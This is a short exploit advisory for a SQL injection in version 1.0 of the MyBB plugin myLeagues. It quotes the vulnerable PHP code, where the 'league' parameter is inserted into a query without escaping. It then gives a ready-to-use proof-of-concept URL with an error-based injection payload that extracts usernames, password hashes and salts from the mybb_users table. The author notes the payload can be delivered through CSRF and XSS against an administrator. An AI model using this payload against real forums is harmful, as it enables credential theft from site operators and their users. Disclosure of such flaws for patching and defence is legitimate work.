MyBB Plugin myLeagues <= 1.0 SQL injection through CSRF

Download | Vote Up (0) | Vote Down (0)

# Version: 1.0

SQL injection
-------------

admin/modules/config/myleagues.php L.174 

 1
 2$new_matchday = array(
 3        'no'        => (int) $mybb->input['no'],
 4        'name'      => $db->escape_string($mybb->input['name']),
 5        'league'    => $mybb->input['league'],
 6        'startdate' => $startdate,
 7        'enddate'   => $enddate
 8);
 9
10$db->insert_query("myleagues_matchdays", $new_matchday);

Proof of concept
----------------

Error based injection (need csrf & XSS to get data back if you're not admin)
http://[site]/admin/index.php?module=config-myleagues&action=add_matchday&no=1&nEame=a&startdate_month=12&startdate_day=23&startdate_year=2000&enddate_month=12&enddate_day=30&enddate_year=2000&league=1%27,%20%272%27,%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28SELECT%20concat%28username,%200x3a,%20password,%200x3a,%20salt,%200x3a%29%20FROM%20mybb_users%20LIMIT%200,1%29,0x7e,%20floor%28rand%280%29*3%29%29%20as%20e%20from%20information_schema.tables%20group%20by%20e%29%20a%29%29--%20-

Groucho

Be the first to give feedback !
Please login to comment !